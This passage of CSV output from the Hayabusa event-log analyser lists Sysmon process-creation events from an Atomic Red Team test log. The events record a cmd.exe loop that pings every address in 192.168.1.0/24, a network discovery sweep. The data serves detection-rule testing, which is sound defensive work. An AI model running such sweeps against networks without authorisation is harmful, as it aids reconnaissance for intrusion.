192.168.1.92 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:21.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:21.488 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:22.030 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:22.542 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 
1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:23.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:23.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:24.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:24.521 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:25.035 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:25.529 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:26.007 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 
747F3D96-D929-5D31-0000-0010765F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:26.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:27.040 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:27.493 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:28.017 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:28.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:29.110 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:29.561 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:30.054 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:30.526 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:31.015 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:31.476 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:32.005 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:32.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:33.004 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:33.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:33.900 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:34.490 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:35.031 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:35.411 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:35.999 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:36.510 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:36.905 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:37.449 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:37.947 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:38.514 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:38.992 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:39.508 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
14:52:40.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:40.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:40.960 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:41.512 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 
747F3D96-D939-5D31-0000-001090E23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:41.967 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:42.436 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:42.881 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:43.478 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
